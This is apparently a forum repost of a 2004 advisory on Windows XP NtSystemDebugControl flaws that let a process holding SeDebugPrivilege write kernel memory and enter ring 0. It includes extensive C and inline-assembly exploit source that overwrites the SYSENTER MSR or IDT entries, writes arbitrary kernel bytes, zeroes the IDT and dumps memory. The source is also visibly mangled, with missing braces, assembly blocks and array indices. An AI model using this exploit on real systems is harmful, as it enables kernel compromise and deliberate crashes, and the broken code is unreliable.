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Multiple WinXP kernel

  • TA的每日心情
    2019-3-12 17:25
  • 签到天数: 3 天


    发表于 2010-11-6 20:32:42 | 显示全部楼层 |阅读模式
    本帖最后由 whypro 于 2010-11-6 20:46 编辑

    Multiple WinXP kernel vulns can give user mode programs kernel mode


    There exist several vulnerabilities in one of Windows XP kernel's native API
    functions which allow any user with the SeDebugPrivilege privilege to
    execute arbitrary code in kernel mode, and read from and write to any memory
    address, including kernel memory.

    Tested systems

    Windows XP Pro SP1 with latest patches

    It's likely that Windows 2003 also is vulnerable.


    ZwSystemDebugControl(), exported from ntdll.dll, calls a Windows operating
    system function NtSystemDebugControl(). This function is executed in ring 0
    (kernel mode) and is meant to be used by user mode debuggers having the
    SeDebugPrivilege privilege.

    Vulnerability #1, enter ring 0 method #1 - SYSENTER/SYSCALL instrs:

    This method writes to IA32_SYSENTER_EIP MSR by calling the kernel
    (NtSystemDebugControl()) and changing the MSR register to point to our code.
    Next time we execute the SYSENTER instruction, we're in ring 0 and have
    total control of the processor. Note that AMD processors may also support
    the SYSCALL instruction which behaves like SYSENTER and could also be used
    to enter ring 0.
    <end vuln #1>

    Vulnerability #2, enter ring 0 method #2 - I/O R/W kernel sub-funcs:

    This method writes to kernel memory. Modify an (preferably unused) IDT entry
    with a pointer to your code and execute an INT n instruction.
    Method1_WriteMemByte() uses a bug in the read I/O sub-function of
    NtSystemDebugControl(). The pointers in the IO_STRUCT aren't checked and we
    can exploit this bug to write to kernel memory. Since the kernel reads from
    an I/O port, we must first control the I/O port's value. This is easy since
    every PC has a BiOS POST port 80h. This is an 8-bit read/write port used by
    the BIOS during POST. If we first write to it, and then later read it, we
    can make the kernel write any byte to any address.
    <end vuln #2>

    Vulnerability #3, enter ring 0 method #3 - bus R/W kernel sub-funcs:

    Same as Method #2 only using DebugSysReadBusData/DebugSysWriteBusData
    sub-functions which will call the HAL to read and write bus data. The
    pointer in the BUS_STRUCT is not verified to be pointing to user data before
    calling the HAL and we can exploit this bug to write to the IDT and get ring
    0 access. This method uses CMOS index 0Eh as our controllable byte.
    <end vuln #3>

    Vulnerability #4, enter ring 0 method #4 - direct HW access:

    Since the user mode program has direct hardware access, it can also read
    from and write to kernel memory with the help of hardware which can access
    the processor's RAM. Similar to methods #2 and #3 only more complex.
    <end vuln #4>

    I have attached source code to test for methods #1-#3 and a few other
    options to show what a user mode program can do. Run it with /test1, /test2,
    and /test3 command line options to test your system.


    Any user with the SeDebugPrivilege privilege could execute arbitrary code as
    the kernel, and read from and write to any address the kernel can. The
    program can do anything to the computer the kernel can, eg. reprogram any
    computer hardware, such as the BIOS flash memory or patch the kernel in

    Since the user needs the SeDebugPrivilege, a privilege normally only given
    to administrators, to exploit these vulnerabilities, these are not serious
    vulnerabilities. The user is also normally an admin so he or she could
    easily install a device driver to become part of the kernel instead of
    exploiting these vulnerabilities.

    Microsoft says it's OK for user mode programs to write to the kernel so long
    as you have the SeDebugPrivilege privilege, and will not fix anything.


    Go to "Local Security Policy\ Security Settings\ Local Policies\ User Rights
    Assignments" and remove all users and groups from "Debug Programs" and
    restart your computer. Note that any malicious program with administrator
    rights could re-enable the SeDebugPrivilege privilege and wait for the next
    reboot and then gain kernel access. Thus this isn't a very good workaround
    if you always log on as the administrator.


    * Discovered and coded Jan 25, 2004
    * Copyright (C)2004 randnut@hotmail.com

    #include <windows.h>
    #include <stdio.h>

    typedef int NTSTATUS;
    #define NTAPI __stdcall

    const IA32_SYSENTER_CS = 0x174;
    const IA32_SYSENTER_ESP = 0x175;
    const IA32_SYSENTER_EIP = 0x176;

    const SelCodeKernel = 0x8;
    const CmosIndx = 0x0E; // CMOS Diagnostic Status
    const RdWrIoPort = 0x80;

    #define FCHK(a) if (!(a)) {printf(#a " failed\n"); return 0;}
    #define FCHK2(a,b) if (!(a)) {printf(#a " failed\n"); goto b;}

    typedef enum _DEBUG_CONTROL_CODE {
    DebugSysReadIoSpace = 14,
    DebugSysWriteIoSpace = 15,
    DebugSysReadMsr = 16,
    DebugSysWriteMsr = 17,
    DebugSysReadBusData = 18,
    DebugSysWriteBusData = 19,

    typedef struct _MSR_STRUCT {
    DWORD MsrNum; // MSR number
    DWORD NotUsed; // Never accessed by the kernel
    DWORD MsrLo; // IN (write) or OUT (read): Low 32 bits of MSR
    DWORD MsrHi; // IN (write) or OUT (read): High 32 bits of MSR

    typedef struct _IO_STRUCT {
    DWORD IoAddr; // IN: Aligned to NumBytes,I/O address
    DWORD Reserved1; // Never accessed by the kernel
    PVOID pBuffer; // IN (write) or OUT (read): Ptr to buffer
    DWORD NumBytes; // IN: # bytes to read/write. Only use 1, 2, or 4.
    DWORD Reserved4; // Must be 1
    DWORD Reserved5; // Must be 0
    DWORD Reserved6; // Must be 1
    DWORD Reserved7; // Never accessed by the kernel
    } IO_STRUCT;

    // Copied from the Windows DDK
    typedef enum _BUS_DATA_TYPE {
      ConfigurationSpaceUndefined = -1,

    // See HalGetBusDataByOffset()/HalSetBusDataByOffset() for explanations of
    each field
    typedef struct _BUS_STRUCT {
    ULONG  Offset;
    PVOID  Buffer;
    ULONG  Length;
    BUS_DATA_TYPE  BusDataType;
    ULONG  BusNumber;
    ULONG  SlotNumber;

    (NTAPI *PZwSystemDebugControl)(
        PVOID InputBuffer,
    ULONG InputBufferLength,
    PVOID OutputBuffer,
        ULONG OutputBufferLength,
    PULONG ReturnLength

    PZwSystemDebugControl ZwSystemDebugControl = NULL;

    enum Ring0Method {

    struct OldCpuState
    Ring0Method meth;
    MSR_STRUCT msr[3];
    DWORD AffinityMask;
    DWORD EFLAGS, CS, SS, OldIdtDesc[2];

    void help()
    printf("Usage: name_of_program [option [option [...]]]\n");
    printf("/test1                            - test for SYSENTER vuln\n");
    printf("/test2                            - test for I/O write to mem
    printf("/test3                            - test for bus write to mem
    printf("/reset                            - reset CPU in ring 0\n");
    printf("/zeroidt                          - zero IDT (reboots PC)\n");
    printf("/wrmem <addr> <byte>              - write byte to mem\n");
    printf("/rdmsr <num>                      - read MSR\n");
    printf("/wrmsr <num> <hi> <lo>            - write MSR\n");
    printf("/rdio <port> <size>               - read I/O port\n");
    printf("/wrio <port> <size> <value>       - write I/O port\n");
    printf("/dump <addr> <size>               - dump memory from ring 0\n");

    int rdmsr(int MsrNum, MSR_STRUCT& msr)
    msr.MsrNum = MsrNum;
    return ZwSystemDebugControl(DebugSysReadMsr, &msr, sizeof(msr), NULL, 0,
    NULL) >= 0;

    int wrmsr(int MsrNum, MSR_STRUCT& msr)
    msr.MsrNum = MsrNum;
    return ZwSystemDebugControl(DebugSysWriteMsr, &msr, sizeof(msr), NULL, 0,
    NULL) >= 0;

    void PrintMsr(MSR_STRUCT& msr)
    printf("MSR %08X = %08X_%08X\n", msr.MsrNum, msr.MsrHi, msr.MsrLo);

    int HasSysEnter()
    int retval = 0;

    mov eax,1
    shr edx,12
    adc retval,0

    return retval;

    int SetProcessor(DWORD NewAffinityMask, DWORD* pOldAffinityMask)
    DWORD tmp;

    FCHK(!pOldAffinityMask || GetProcessAffinityMask(GetCurrentProcess(),
    pOldAffinityMask, &tmp));
    FCHK(SetProcessAffinityMask(GetCurrentProcess(), NewAffinityMask));

    return 1;

    * Returns < 0 on error. If ppAddr != NULL, returns 0x100 on success.
    * If ppAddr == NULL, returns byte read on success.
    int CmosRead(int offs, BYTE** ppAddr = NULL)
    BYTE buf;
    BUS_STRUCT bus;

    bus.BusDataType = Cmos;
    bus.BusNumber = 0;
    bus.SlotNumber = offs;
    bus.Buffer = ppAddr ? *ppAddr : &buf;
    bus.Offset = 0;
    bus.Length = 1;

    if (ZwSystemDebugControl(DebugSysReadBusData, &bus, sizeof(bus), NULL, 0,
    NULL) < 0)
    return -1;
    return ppAddr ? 0x100 : buf;

    * Returns 0 on failure, 1 on success
    int CmosWrite(int offs, BYTE val, BYTE** ppAddr = NULL)
    BUS_STRUCT bus;

    bus.BusDataType = Cmos;
    bus.BusNumber = 0;
    bus.SlotNumber = offs;
    bus.Buffer = ppAddr == NULL ? &val : *ppAddr;
    bus.Offset = 0;
    bus.Length = 1;

    return ZwSystemDebugControl(DebugSysWriteBusData, &bus, sizeof(bus), NULL,
    0, NULL) >= 0;

    * Write a byte to any location by exploiting another bug in the kernel. This
    * uses DebugSysWriteIoSpace and DebugSysReadIoSpace to write the byte to any
    * This code must execute in ring 3.
    int Method1_WriteMemByte(DWORD MemAddr, BYTE Value)
    IO_STRUCT io;

    memset(&io, 0, sizeof(io));
    io.IoAddr = RdWrIoPort;
    io.pBuffer = &Value;
    io.NumBytes = 1;
    io.Reserved4 = 1;
    io.Reserved6 = 1;
    if (ZwSystemDebugControl(DebugSysWriteIoSpace, &io, sizeof(io), NULL, 0,
    NULL) < 0)
    return 0;

    memset(&io, 0, sizeof(io));
    io.IoAddr = RdWrIoPort;
    io.pBuffer = (PVOID)(ULONG_PTR)MemAddr;
    io.NumBytes = 1;
    io.Reserved4 = 1;
    io.Reserved6 = 1;
    if (ZwSystemDebugControl(DebugSysReadIoSpace, &io, sizeof(io), NULL, 0,
    NULL) < 0)
    return 0;

    return 1;

    * Read a byte from any location by exploiting another bug in the kernel.
    This function
    * uses DebugSysWriteIoSpace and DebugSysReadIoSpace to read the byte from
    any address.
    * This code must execute in ring 3.
    int Method1_ReadMemByte(DWORD MemAddr)
    BYTE Value;

    IO_STRUCT io;
    memset(&io, 0, sizeof(io));
    io.IoAddr = RdWrIoPort;
    io.pBuffer = (PVOID)(ULONG_PTR)MemAddr;
    io.NumBytes = 1;
    io.Reserved4 = 1;
    io.Reserved6 = 1;
    if (ZwSystemDebugControl(DebugSysWriteIoSpace, &io, sizeof(io), NULL, 0,
    NULL) < 0)
    return -1;

    memset(&io, 0, sizeof(io));
    io.IoAddr = RdWrIoPort;
    io.pBuffer = &Value;
    io.NumBytes = 1;
    io.Reserved4 = 1;
    io.Reserved6 = 1;
    if (ZwSystemDebugControl(DebugSysReadIoSpace, &io, sizeof(io), NULL, 0,
    NULL) < 0)
    return -1;

    return Value;

    int CmosTest()
    int OldVal = CmosRead(CmosIndx);
    if (OldVal < 0)
    return 0;

    static int HasTested = 0;
    if (HasTested == 0)
    HasTested = -1;

    if (!CmosWrite(CmosIndx, 0x55) || CmosRead(CmosIndx) != 0x55 ||
    !CmosWrite(CmosIndx, 0xAA) || CmosRead(CmosIndx) != 0xAA ||
    !CmosWrite(CmosIndx, (BYTE)OldVal))
    printf("There's something wrong with your CMOS\n");
    return 0;

    HasTested = 1;
    else if (HasTested == -1)
    return 0;

    return 1;

    * Write a byte to any location by exploiting another bug in the kernel. This
    * uses DebugSysReadBusData and DebugSysWriteBusData to write the byte to any
    * This code must execute in ring 3.
    int Method2_WriteMemByte(DWORD MemAddr, BYTE Value)
    if (!CmosTest())
    return 0;

    int OldVal = CmosRead(CmosIndx);
    if (OldVal < 0)
    return 0;

    BYTE* p = (BYTE*)(ULONG_PTR)MemAddr;
    if (!CmosWrite(CmosIndx, Value) || CmosRead(CmosIndx, &p) < 0 ||
    !CmosWrite(CmosIndx, OldVal))
    return 0;

    return 1;

    * Read a byte from any location by exploiting another bug in the kernel.
    This function
    * uses DebugSysReadBusData and DebugSysWriteBusData to read the byte from
    any address.
    * This code must execute in ring 3.
    int Method2_ReadMemByte(DWORD MemAddr)
    int OldVal, RetVal;

    if (!CmosTest())
    return -1;

    BYTE* p = (BYTE*)(ULONG_PTR)MemAddr;
    if ((OldVal = CmosRead(CmosIndx)) < 0 || !CmosWrite(CmosIndx, 0, &p) ||
    (RetVal = CmosRead(CmosIndx)) < 0 || !CmosWrite(CmosIndx, (BYTE)OldVal))
    return -1;

    return RetVal;

    static int MemAccessMethType = -1;
    int SetMemAccessMeth(int NewMeth)
    int old = MemAccessMethType;

    if (NewMeth == -1 || NewMeth == 1 || NewMeth == 2)
    MemAccessMethType = NewMeth;

    return old;

    int WriteMemByte(DWORD MemAddr, BYTE Value)
    switch (MemAccessMethType)
    case 1:
    return Method1_WriteMemByte(MemAddr, Value);

    case 2:
    return Method2_WriteMemByte(MemAddr, Value);

    case -1:
    return Method1_WriteMemByte(MemAddr, Value) ||
    Method2_WriteMemByte(MemAddr, Value);

    int ReadMemByte(DWORD MemAddr)
    switch (MemAccessMethType)
    case 1:
    return Method1_ReadMemByte(MemAddr);

    case 2:
    return Method2_ReadMemByte(MemAddr);

    case -1:
    int RetVal;
    if ((RetVal = Method1_ReadMemByte(MemAddr)) >= 0 ||
    (RetVal = Method2_ReadMemByte(MemAddr)) >= 0)
    (void)0 /* Nothing */;
    return RetVal;

    * Tries to enter ring 0 by overwriting IA32_SYSENTER_EIP and executing
    * Returns 1 on success. If it returns 1, EFLAGS.IF=0.
    int Method1_EnterRing0(OldCpuState& old)
    old.meth = Method1;
    if (!HasSysEnter())
    return 0;

    FCHK(SetProcessor(1, &old.AffinityMask));
    FCHK2(rdmsr(IA32_SYSENTER_CS, old.msr[0]), cleanup);
    FCHK2(rdmsr(IA32_SYSENTER_ESP, old.msr[1]), cleanup);
    FCHK2(rdmsr(IA32_SYSENTER_EIP, old.msr[2]), cleanup);

    DWORD Ring0Addr;
    mov Ring0Addr,offset ring0_addr

    Sleep(100); // A more reliable way is to block all interrupts through the

    MSR_STRUCT msr;
    if (old.msr[0].MsrLo == 0) // SYSENTER not enabled
    // I assume the OS sets up the GDT as follows:
    // base:ring0 code
    // ring0 data
    // ring3 code
    // ring3 data
    // Will crash eventually if it's not setup that way
    msr.MsrLo = SelCodeKernel;
    msr.MsrHi = 0;
    FCHK2(wrmsr(IA32_SYSENTER_CS, msr), cleanup);

    msr.MsrHi = 0;
    msr.MsrLo = Ring0Addr;
    FCHK2(wrmsr(IA32_SYSENTER_EIP, msr), cleanup2); // Let's hope we won't get
    interrupted after this call

    mov ecx,esp
    // Hmm, can't assemble SYSENTER or DB 0F,34
    jmp short $+3
    mov eax,9090340Fh
    mov esp,ecx
    // Hot dog! :)

    return 1;

    if (old.msr[0].MsrLo == 0)
    wrmsr(IA32_SYSENTER_CS, old.msr[0]);
    FCHK(SetProcessor(old.AffinityMask, NULL));
    return 0;

    * Enters ring 3
    void Method1_LeaveRing0(OldCpuState& old)
    MSR_STRUCT* pmsr = &old.msr[0];
    mov ebx,pmsr

    mov ecx,[ebx] // IA32_SYSENTER_CS
    mov eax,[ebx+8]
    mov edx,[ebx+0Ch]
    test eax,eax
    jz skip1

    mov ecx,[ebx+10h] // IA32_SYSENTER_ESP
    mov eax,[ebx+10h+8]
    mov edx,[ebx+10h+0Ch]

    mov ecx,[ebx+20h] // IA32_SYSENTER_EIP
    mov eax,[ebx+20h+8]
    mov edx,[ebx+20h+0Ch]

    mov ecx,esp
    mov edx,offset ring3_code
    // Hmm, can't assemble SYSEXIT or DB 0F,35
    jmp short $+3
    mov eax,90350FFBh
    if (old.msr[0].MsrLo == 0) // SYSENTER was not enabled
    wrmsr(old.msr[0].MsrNum, old.msr[0]);

    SetProcessor(old.AffinityMask, NULL);

    * Tries to enter ring 0 by telling the kernel to write to the IDT with bytes
    we control.
    * Returns 1 on success. If it returns 1, EFLAGS.IF=0.
    int Method2_EnterRing0(OldCpuState& old)
    old.meth = Method2;
    FCHK(SetProcessor(1, &old.AffinityMask));

    DWORD Ring0Addr, EFLAGS, _CS, _SS;
    DWORD idt[2], idt_base, idt_limit;
    mov Ring0Addr,offset ring0_addr
    sidt idt+2
    movzx eax,word ptr idt+2
    mov idt_limit,eax
    mov eax,idt+4
    mov idt_base,eax
    pop eax
    mov EFLAGS,eax
    mov word ptr _CS,cs
    mov word ptr _SS,ss
    old.EFLAGS = EFLAGS;
    old.CS = _CS;
    old.SS = _SS;

    #define IntNum 0xFF

    if (IntNum*8 + 7 > idt_limit)
    printf("ERROR: The interrupt number is outside the IDT. Change it and
    goto cleanup;

    BYTE* pOldIdtDesc = (BYTE*)&old.OldIdtDesc;
    for (int i = 0; i < 8; i++)
    int SomeByte;
    FCHK2((SomeByte = ReadMemByte(idt_base + IntNum*8 + i)) >= 0, cleanup);
    *pOldIdtDesc++ = (BYTE)SomeByte;

    DWORD IdtDesc[2];
    IdtDesc[0] = (SelCodeKernel << 16) | (Ring0Addr & 0xFFFF);
    IdtDesc[1] = (Ring0Addr & 0xFFFF0000) | 0xEE00; // 32-bit interrupt gate,

    for (int i = 0; i < 8; i++)
    FCHK2(WriteMemByte(idt_base + IntNum*8 + i, *((BYTE*)&IdtDesc + i)),

    xchg esp,eax
    int IntNum
    xchg esp,eax
    // What do you know, it worked!

    return 1;

    FCHK(SetProcessor(old.AffinityMask, NULL));
    return 0;

    * Enters ring 3
    void Method2_LeaveRing0(OldCpuState& old)
    DWORD idt[2];
    DWORD _CS = old.CS;
    DWORD _SS = old.SS;
    DWORD* pOldIdtDesc = &old.OldIdtDesc[0];
    sidt idt+2
    mov eax,idt+4
    mov ecx,pOldIdtDesc
    mov edx,[ecx]
    mov ecx,[ecx+4]
    mov [eax+IntNum*8],edx
    mov [eax+IntNum*8+4],ecx

    mov eax,esp
    push _SS
    push eax
    mov eax,EFLAGS
    and eax,not (1 shl 0Eh)
    push eax
    push _CS
    push offset ring3_addr

    SetProcessor(old.AffinityMask, NULL);

    int EnterRing0(OldCpuState& old)
    * Method2 is safer than Method1
    return Method2_EnterRing0(old) || Method1_EnterRing0(old);

    void LeaveRing0(OldCpuState& old)
    switch (old.meth)
    case Method1: Method1_LeaveRing0(old); break;
    case Method2: Method2_LeaveRing0(old); break;
    default: __asm jmp short $

    int EnablePrivilege(HANDLE hToken, LPCSTR lpszName, int enable)

    tok.PrivilegeCount = 1;
    tok.Privileges[0].Attributes = enable ? SE_PRIVILEGE_ENABLED : 0;

    FCHK(LookupPrivilegeValue(NULL, lpszName, &tok.Privileges[0].Luid));
    FCHK(AdjustTokenPrivileges(hToken, FALSE, &tok, sizeof(tok), NULL, NULL));

    return 1;

    void PrintDelay(int secs)
    while (secs--)
    printf("%d..", secs+1);

    void PrintVulnMsg(int failed)
    if (!failed)
    printf("Your operating system is vulnerable to this exploit.\n");
    printf("If this user account has the SeDebugPrivilege privilege then
    printf("OS doesn't appear to be vulnerable.\n\n");

    DWORD ReadMem(DWORD MemAddr, void* buf, DWORD bufsz)
    if (!bufsz || !buf)
    return 0;

    #if 0
    * Will crash XP if we read from non-present memory so don't use this code
    BYTE* p = (BYTE*)buf;
    for (DWORD i = 0; i < bufsz; i++)
    int SomeByte;
    if ((SomeByte = ReadMemByte(MemAddr++)) < 0)
    p = (BYTE)SomeByte;
    return i;
    OldCpuState old;
    if (!EnterRing0(old))
    return 0;

    DWORD ret_val;
    sub esp,8
    sidt [esp+2]
    mov ebx,[esp+4]
    add esp,8
    push dword ptr [ebx+0Eh*8]
    push dword ptr [ebx+0Eh*8+4]

    mov eax,offset xcpt_handler
    mov [ebx+0Eh*8],eax
    mov [ebx+0Eh*8+4],eax
    mov word ptr [ebx+0Eh*8+4],8E00h
    mov word ptr [ebx+0Eh*8+2],cs

    mov ecx,bufsz
    mov esi,MemAddr
    mov edi,buf
    rep movsb
    jmp skip_xcpt
    add esp,8
    pop eax
    pop dword ptr [ebx+0Eh*8+4]
    pop dword ptr [ebx+0Eh*8]

    mov eax,bufsz
    sub eax,ecx
    mov ret_val,eax

    return ret_val;

    int DumpMem(DWORD MemAddr, DWORD size)
    if (size == 0)
    return 1;
    if (MemAddr + size - 1 < MemAddr)
    return 0;

    DWORD OldMask;
    FCHK(SetProcessor(1, &OldMask));

    int ret = 1;
    const BytesPerLine = 16;
    while (size)
    BYTE buf[BytesPerLine];
    DWORD addr = MemAddr - MemAddr % BytesPerLine;
    DWORD SizeRead = ReadMem(addr, buf, BytesPerLine);

    printf("%08X:", addr);
    for (int i = 0; i < BytesPerLine; i++)
    if ((i & 3) == 0 && i != 0)
    printf(" ");
    if (addr < MemAddr || addr > MemAddr+size-1)
    printf("  ");
    else if ((DWORD)i >= SizeRead)
    printf("%02X", buf);
    printf(" ");

    addr = MemAddr - MemAddr % BytesPerLine;
    for (int i = 0; i < BytesPerLine; i++)
    if (addr < MemAddr || addr > MemAddr+size-1)
    printf(" ");
    else if ((DWORD)i >= SizeRead)
    else if (buf >= 0x20 && buf <= 0x7E)
    printf("%c", buf);

    size -= min(size, addr - MemAddr);
    MemAddr = addr;

    SetProcessor(OldMask, NULL);
    return ret;

    int main(int argc, char* argv[])
    HMODULE hNtdll;
    FCHK((hNtdll = LoadLibrary("ntdll.dll")) != NULL);
    FCHK((ZwSystemDebugControl = (PZwSystemDebugControl)GetProcAddress(hNtdll,
    "ZwSystemDebugControl")) != NULL);

    HANDLE hToken;
    FCHK(OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES |
    TOKEN_QUERY, &hToken));
    FCHK(EnablePrivilege(hToken, SE_DEBUG_NAME, 1));

    for (int i = 1; i < argc; i++)
    char* s = argv;
    if (*s != '/' && *s != '-')

    if (!strcmp(s, "rdmsr") && i+1 < argc)
    MSR_STRUCT msr;
    int num = strtoul(argv[++i], NULL, 0);
    if (rdmsr(num, msr))
    printf("rdmsr(%08X) failed\n", num);
    else if (!strcmp(s, "wrmsr") && i+3 < argc)
    MSR_STRUCT msr;
    int num = strtoul(argv[++i], NULL, 0);
    msr.MsrHi = strtoul(argv[++i], NULL, 0);
    msr.MsrLo = strtoul(argv[++i], NULL, 0);
    if (!wrmsr(num, msr))
    printf("wrmsr(%08X) failed\n", num);
    if (rdmsr(num, msr))
    printf("rdmsr(%08X) failed\n", num);
    else if (!strcmp(s, "rdio") && i+2 < argc)
    IO_STRUCT io;
    memset(&io, 0, sizeof(io));
    DWORD Buffer;
    io.IoAddr = strtoul(argv[++i], NULL, 0);
    io.pBuffer = &Buffer;
    io.NumBytes = strtoul(argv[++i], NULL, 0);
    io.Reserved4 = 1;
    io.Reserved6 = 1;

    if (io.NumBytes != 1 && io.NumBytes != 2 && io.NumBytes != 4)
    printf("Size must be 1, 2, or 4 bytes\n");
    if (ZwSystemDebugControl(DebugSysReadIoSpace, &io, sizeof(io), NULL, 0,
    NULL) < 0)
    printf("Could not read I/O space\n");
    switch (io.NumBytes)
    case 1: printf("0x%02X\n", (BYTE)Buffer); break;
    case 2: printf("0x%04X\n", (WORD)Buffer); break;
    case 4: printf("0x%08X\n", Buffer); break;
    default: printf("WTF\n"); break;
    else if (!strcmp(s, "wrio") && i+3 < argc)
    IO_STRUCT io;
    memset(&io, 0, sizeof(io));
    DWORD Buffer;
    io.IoAddr = strtoul(argv[++i], NULL, 0);
    io.pBuffer = &Buffer;
    io.NumBytes = strtoul(argv[++i], NULL, 0);
    io.Reserved4 = 1;
    io.Reserved6 = 1;
    Buffer = strtoul(argv[++i], NULL, 0);

    if (io.NumBytes != 1 && io.NumBytes != 2 && io.NumBytes != 4)
    printf("Size must be 1, 2, or 4 bytes\n");
    if (ZwSystemDebugControl(DebugSysWriteIoSpace, &io, sizeof(io), NULL, 0,
    NULL) < 0)
    printf("Could not write to I/O space\n");
    else if (!strcmp(s, "reset"))
    OldCpuState old;
    printf("Will reset computer in...");

    if (!EnterRing0(old))
    printf("Could not enter ring 0\n");
    push 0
    lidt [esp]
    pop esp
    inc esp
    push esp
    else if (!strcmp(s, "wrmem") && i+2 < argc)
    DWORD MemAddr = strtoul(argv[++i], NULL, 0);
    BYTE Value = (BYTE)strtoul(argv[++i], NULL, 0);

    if (!WriteMemByte(MemAddr, Value))
    printf("Could not write the byte\n");
    else if (!strcmp(s, "zeroidt"))
    DWORD OldMask;
    if (!SetProcessor(1, &OldMask))
    printf("SetProcessor() failed\n");

    DWORD idt[2];
    int idt_size, idt_base;
    sidt idt+2
    movzx eax,word ptr idt+2
    mov idt_size,eax
    mov eax,idt+4
    mov idt_base,eax
    printf("Will start writing to IDT @ %08X in...", idt_base);

    for (int j = 0; j <= idt_size; j++)
    if (!WriteMemByte(idt_base + j, 0x00))
    printf("Could not write the byte to address %08X\n", idt_base + j);
    if (j != 0)

    SetProcessor(OldMask, NULL);
    else if (!strcmp(s, "test1"))
    if (!HasSysEnter())
    printf("Sorry. SYSENTER/SYSEXIT instructions aren't supported by your

    int failed = 1;
    OldCpuState old;

    printf("Testing SYSENTER vulnerability in...");

    if (Method1_EnterRing0(old))
    failed = 0;

    else if (!strcmp(s, "test2"))
    int failed = 1;
    OldCpuState old;

    printf("Testing I/O write to memory vulnerability in...");

    int OldWrite = SetMemAccessMeth(1);
    if (Method2_EnterRing0(old))
    failed = 0;

    else if (!strcmp(s, "test3"))
    int failed = 1;
    OldCpuState old;

    printf("Testing bus write to memory vulnerability in...");

    int OldWrite = SetMemAccessMeth(2);
    if (Method2_EnterRing0(old))
    failed = 0;

    else if (!strcmp(s, "dump") && i+2 < argc)
    DWORD MemAddr = strtoul(argv[++i], NULL, 0);
    DWORD size = strtoul(argv[++i], NULL, 0);

    if (!DumpMem(MemAddr, size))
    printf("Could not dump memory\n");

    return 1;
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